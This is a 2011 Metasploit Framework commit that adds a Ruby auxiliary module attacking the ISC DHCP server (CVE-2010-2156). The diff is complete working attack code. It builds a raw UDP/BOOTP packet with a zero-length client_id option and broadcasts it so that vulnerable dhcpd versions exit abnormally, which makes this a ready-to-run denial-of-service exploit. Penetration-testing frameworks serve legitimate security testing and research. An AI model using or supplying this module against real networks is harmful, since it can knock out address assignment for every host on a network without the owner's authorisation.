Added ISC DHCP Zero Length ClientID DoS Module thx TheLightCosine

git-svn-id: file:///home/svn/framework3/trunk@12293 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-11 15:56:39 +00:00 · 2011-04-11 15:56:39 +00:00 · 5e89b22aae
parent e9e8026832
commit 5e89b22aae
1 changed files with 82 additions and 0 deletions
--- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
+++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
@ -0,0 +1,82 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'racket'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Auxiliary::Dos
+	include Msf::Exploit::Capture
+
+	def initialize
+		super(
+			'Name'          => 'ISC DHCP Zero Length ClientID Denial of Service Module',
+			'Description'   => %q{ 
+					This module performs a Denial of Service Attack against the ISC DHCP server, 
+				versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request 
+				message with a 0-length client_id option for an IP address on the appropriate range
+				for the dhcp server. When ISC DHCP Server tries to hash this value it exits 
+				abnormally.
+			},
+			'Author'        =>
+					[
+						'sid', # Original POC
+						'TheLightCosine' # msf module
+					],
+			'License'       => MSF_LICENSE,
+			'Version'       => '$Revision$',
+			'References'    =>
+				[
+					[ 'CVE', 'CVE-2010-2156' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/14185/']
+				]
+		)
+		register_options(
+			[
+				OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
+			]
+		)
+		deregister_options('RHOST','FILTER','PCAPFILE')
+	end
+
+	def run
+		print_status("Creating DHCP Request with 0-length ClientID")
+		open_pcap
+		n = Racket::Racket.new
+
+		n.layers[3] = Racket::L3::IPv4.new
+		n.layers[3].dst_ip = '255.255.255.255'
+		n.layers[3].version = 4
+		n.layers[3].hlen = 0x05
+		n.layers[3].ttl = 44
+		n.layers[3].protocol = 0x11
+
+		n.layers[4] = Racket::L4::UDP.new
+		n.layers[4].src_port = 68
+		n.layers[4].dst_port = 67
+
+		n.layers[5] = Racket::L5::BOOTP.new
+		n.layers[5].cip = datastore['RIP']
+		n.layers[5].chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
+		n.layers[5].type = 1
+		n.layers[5].payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
+
+		n.layers[4].payload = n.layers[5]
+		n.layers[4].fix!(n.layers[3].src_ip, n.layers[3].dst_ip)
+		n.layers[4].payload = ""
+
+		buff = n.pack
+		print_status("Sending malformed DHCP request...")
+		capture_sendto(buff, '255.255.255.255')
+		close_pcap
+	end
+end